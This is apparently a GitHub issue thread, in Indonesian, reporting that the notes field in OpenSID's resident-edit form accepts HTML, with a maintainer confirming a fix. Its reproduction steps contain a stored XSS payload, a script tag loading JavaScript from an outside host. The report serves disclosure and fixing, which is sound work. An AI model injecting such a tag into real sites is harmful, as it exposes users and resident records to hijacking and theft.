### ISSUE TITLE
Bug/error: Field keterangan pada edit penduduk bisa dimasukkan tag html

### ISSUE THREAD

**Issue by pandigresik** [OpenSID/OpenSID#6863]
### Jelaskan error yg dialami

Field keterangan pada edit penduduk bisa dimasukkan tag html

### Cara untuk mereplikasi errornya

1. Masuk menu Kependudukan 
2. Menu Penduduk
3. Pilih salah satu penduduk - edit biodata penduduk
4. Pada field keterangan bagian paling bawah isi dengan tag html misalnya
`<script type="text/javascript" src="https://jso-tools.z-x.my.id/raw/~/D2NBPYG1EKMUW"></script>`

### Hasil yg diharapkan

Lakukan sanitasi tag html ketika proses simpan, sehingga sistem lebih aman

### Tangkapan layar dan log error

![image](https://github.com/OpenSID/OpenSID/assets/1853475/b0ad320f-fc9e-4313-88c6-7956ffbc048d)
Hasil setelah proses simpan

### Rilis Versi OpenSID

Rilis Premium

### Versi OpenSID

2307.0.1 premium

**Comment by andifahruddinakas** [comment]
Sudah diperbaiki melalui PR https://github.com/OpenSID/premium/pull/2583
